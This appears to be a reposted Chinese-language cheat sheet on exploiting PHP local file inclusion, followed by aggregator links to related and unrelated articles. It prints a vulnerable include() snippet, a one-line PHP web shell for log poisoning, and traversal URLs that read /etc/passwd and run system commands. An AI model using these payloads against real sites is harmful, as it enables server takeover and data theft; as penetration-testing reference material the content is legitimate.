LFI漏洞利用总结
- 主要涉及到的函数
- include(),require()、include_once(),require_once()
- magic_quotes_gpc()、allow_url_fopen()、allow_url_include()、move_uploaded_file() 、readfile() file()、and file_get_contents()、upload_tmp_dir()、post_max_size()、and max_input_time()等
- 典型漏洞代码:
- <!–?php include($_GET['pages'].‘.php’); ?–>
- 黑盒判断方法:
- 单纯的从URL判断的话,URL中path、dir、file、pag、page、archive、p、eng、语言文件等相关关键字眼的时候,可能存在文件包含漏洞。
- 本地包含漏洞的利用(这里先忽略截断问题)
- 1、包含同服务器中上传的jpg、txt、rar等文件,这个是最理想的情况了。
- 2、包含系统的各种日志,如apache日志,文件系统日志等 其中apache当记录格式为combined,一般日志都会很大,基本无法包含成功。包含log是有自动化攻击程序的。
- 其中鬼子的博客中有提到一个空格的问题。见《邪恶的空格-PHP本地文件包含漏洞的新突破口》 解决空格问题其实把一句话base64加密后再写入就可以执行了。
- 3、包含/proc/self/environ . 这个环境变量有访问web的session信息和包含user-agent的参数。user-agent在客户端是可以修改的。参考:《Shell via LFI –proc/self/environ method//http://hi.baidu.com/root_exp/blog/item /9c0571fc2d42664fd7887d7d.html》
- 4、包含由php程序本身生成的文件,缓存、模版等,开源的程序成功率大。
- 5、利用本地包含读取PHP敏感性文件,需要PHP5以上版本。如看到“config”的源码如下
- index.php?pages=php://filter/read=convert.base64-encode/resource=config
- 特别的情况用到readfile() 函数不是包含执行,可以直接读源码。
- 6、利用phpinfo页面getshell。一般大组织的web群存在phpinfo的机会挺大的。
- poc和介绍参考《利用phpinfo信息LFI临时文件》//http://www.2cto.com/Article/201202/119213.html
- 7、利用包含出错,或者包含有未初始化变量的PHP文件,只要变量未初始化就可能再次攻击 具体见《include()本地文件包含漏洞随想》//http://www.2cto.com/Article/200809/29748.html
- 8、结合跨站使用 index.php?pages=http:// www.2cto.com /path/xss.php?xss=phpcode (要考虑域信任问题)
- 9、包含临时文件文件。这个方法很麻烦的。参考 《POST method uploads》//http://www.php.net/manual/en/features.file-upload.post-method.php
- 解决临时文件删除方法:慢连接 (注:前提是file_uploads = On,5.3.1中增加了max_file_uploadsphp.ini file_uploads = On,5.3.1中增加了max_file_uploads,默认最大一次上传20个)
- windows格式:win下最长4个随机字符( ‘a’-’z’, ‘A’-’Z’, ’0′-’9′)如:c:/windows/temp/php3e.tmp
- linux格式:6个随机字符( ‘a’-’z’, ‘A’-’Z’, ’0′-’9′) 如:/tmp/phpUs7MxA
- 慢连接的两种上传代码参考:《PHP安全之LFI漏洞GetShell方法大阅兵》//www.2cto.com/Article/201106/94414.html
- 10、当前实在找不到写权限目录时候,注入到log中再寻找写权限目录。如注入<?php $s=$_GET;@chdir($s['x']);echo @system($s['y'])?>到log.
- Linux: index.php?pages=/var/log/apache/logs/error_log%00&x=/&y=uname
- windows: index.php?pages=..\apache\logs\error.log%00&x=.&y=dir
- 具体参考《PHP本地文件包含(LFI)漏洞利用》http://www.2cto.com/Article/201202/119214.html
- 11、使用php wrapper例如php://input、php://filter、data://等包含文件 在《PHP 5.2.0 and allow_url_include》//http://blog.php-security.org/archives/45-PHP-5.2.0- and-allow_url_include.html 其中文中提到的allow_url_fopen和allow_url_include只是保护了against URL handles标记为URL.这影响了http(s) and ftp(s)但是并没有影响php或date 这些url形式。
- 12、LFI判断目录是否存在和列目录,如
- **index.php?pages=../../../../../../var/www/dossierexistant/../../../../../etc/passwd%00
- **这个方法在TTYshell上是可以完全是可以判断的,但是在URL上有时候不可行。即使不存在dossierexistant也可以回显passwd内容。
- index.php?pages=../../../../../../var/www/dossierexistant/../../../../../etc/passwd%00
- **FreeBSD 《directory listing with PHP file functions》http://websec.wordpress.com/2009 …php-file-functions/ 列目录
- **存在逻辑判断的时候,如不存在该目录就会返回header.php+File not found+footer.php 存在就会返回header.php+footer.php。这种逻辑很符合程序员的习惯。曾经用找到了一个目录很深的日志获得shell。
- 13、包含SESSION文件,php保存格式sess_SESSIONID 默认位置是/tmp/(PHP Sessions)、/var/lib/php/session/(PHP Sessions)、/var/lib/php5/(PHP Sessions) 和c:/windows/temp/(PHP Sessions)等文件中。
- 14、包含/proc/self/cmdline 或者/proc/self/fd/<fd number>找到log文件 (拥有者为root,默认情况要root才能访问)
- 具体参考Local File Inclusion – 《Tricks of the Trade》http://labs.neohapsis.com/2008/0 …ricks-of-the-trade/ 还有其他提到包含/var/log/auth.log的,但是这个文件默认情况也是644.
- 15、包含maillog 通常位置/var/log/maillog 这个方法也很鸡肋,具体参考《local file inclusion tricks 》http://devels-playground.blogspo …clusion-tricks.html
- 16、包含固定的文件,非常鸡肋,为了完整性也提下。如,可用中间人攻击。
- <?php include(“http://172.0.0.1/code.php “); ?>
- 关于截断
- (简单介绍下,谷歌下很多文章提到了)
- 截断要考虑两个问题magic_quotes_gpc()和PHP版本。
- 1、%00空字符截断,除了这个截断在php 5.3.4以下版本好用外,以下截断都是有条件的。
- 2、windows
- Linux文件名大于4096字符被截断
- Windows: 文件名大于256字符被截断
- 参考的文档很多就不一一列举了。这个文章希望能给大家遇到LFI的时候有点帮助
LFI漏洞利用总结的更多相关文章
- LFI漏洞利用总结(转载)
主要涉及到的函数include(),require().include_once(),require_once()magic_quotes_gpc().allow_url_fopen().allow_ ...
- phpMyAdmin 4.8.x 本地文件包含漏洞利用
phpMyAdmin 4.8.x 本地文件包含漏洞利用 今天ChaMd5安全团队公开了一个phpMyAdmin最新版中的本地文件包含漏洞:phpmyadmin4.8.1后台getshell.该漏洞利用 ...
- 本地文件包含漏洞(LFI漏洞)
0x00 前言 本文的主要目的是分享在服务器遭受文件包含漏洞时,使用各种技术对Web服务器进行攻击的想法. 我们都知道LFI漏洞允许用户通过在URL中包括一个文件.在本文中,我使用了bWAPP和DVW ...
- PHP文件包含漏洞(利用phpinfo)复现
0x01 简介 PHP文件包含漏洞中,如果找不到可以包含的文件,我们可以通过包含临时文件的方法来getshell.因为临时文件名是随机的,如果目标网站上存在phpinfo,则可以通过phpinfo来获 ...
- Linux环境下常见漏洞利用技术(培训ppt+实例+exp)
记得以前在drops写过一篇文章叫 linux常见漏洞利用技术实践 ,现在还可以找得到(https://woo.49.gs/static/drops/binary-6521.html), 不过当时开始 ...
- apt28组织新的flash漏洞利用包dealerschoice分析
17号paloalto发布了文章dealerschoice-sofacys-flash-player-exploit-platform,文中提到apt28正在编写adobe flash player的 ...
- Linux堆溢出漏洞利用之unlink
Linux堆溢出漏洞利用之unlink 作者:走位@阿里聚安全 0 前言 之前我们深入了解了glibc malloc的运行机制(文章链接请看文末▼),下面就让我们开始真正的堆溢出漏洞利用学习吧.说实话 ...
- Struts2漏洞利用实例
Struts2漏洞利用实例 如果存在struts2漏洞的站,administrator权限,但是无法加管理组,内网,shell访问500. 1.struts2 漏洞原理:struts2是一个框架,他在 ...
- Drupal 7.31SQL注入getshell漏洞利用详解及EXP
0x00 这个漏洞威力确实很大,而且Drupal用的也比较多,使用Fuzzing跑字典应该可以扫出很多漏洞主机,但是做批量可能会对对方网站造成很大的损失,所以我也就只是写个Exp不再深入下去. 0x0 ...
随机推荐
- Excel数据导入到Sharepoint List
这个功能是从XML中读取需要导入到Sharepoint List的列名字,然后把Excel中对应的数据导入到Sharepoint List中.基本原理,把Excel中数据临时放到Datatable中, ...
- 浅谈FloatingActionButton(悬浮按钮)
一.介绍 这个类是继承自ImageView的,所以对于这个控件我们可以使用ImageView的所有属性 android.support.design.widget.FloatingActionButt ...
- Android每次运行项目时重新启动一个新的模拟器的解决办法
具体解决办法 1.打开任务管理器,结束adb进程 2.此时android console下面会出现错误信息 3.切换到dos下面运行: adb start-server 4.重新运行android项目 ...
- HDOJ1001-1005题解
1001--Sum Problem(http://acm.hdu.edu.cn/showproblem.php?pid=1001) #include <stdio.h> int sum(i ...
- Android数据存储五种方式总结
本文介绍Android平台进行数据存储的五大方式,分别如下: 1 使用SharedPreferences存储数据 2 文件存储数据 3 SQLite数据库存储数据 4 使用Cont ...
- 【代码笔记】iOS-点评内容
一,效果图. 二,工程图. 三,代码. ViewController.h #import <UIKit/UIKit.h> @interface ViewController : UIVie ...
- 【读书笔记】iOS-ARC-环境下如何查看引用计数的变化
一,新建立一个工程,用于测试引用计数的变化. 二,找到如下路径Build Phases---->Compile Sources---->AppDelegate.m 三,选中AppDeleg ...
- HTML5 画布canvas元素
HTML5的canvas元素以及随其而来的编程接口Canvas API应用前景极为广泛.简单地说,canvas元素能够在网页中创建一块矩形区域,这块矩形区域可以成为画布,这其中可以绘制各种图形.可别小 ...
- 你知道C#中的Lambda表达式的演化过程吗
你知道C#中的Lambda表达式的演化过程吗? 阅读目录 委托的使用 匿名方法 Func和Action Lambda的诞生 那得从很久很久以前说起了,记得那个时候... 懵懂的记得从前有个叫委托的东西 ...
- ARC下的所有权修饰符
ARC有效时,id类型必须加上所有权修饰符 下面为三种等效的声明,为了便于和二级指针的情况联系起来,采用第一种. NSError * __weak error = nil; NSError __wea ...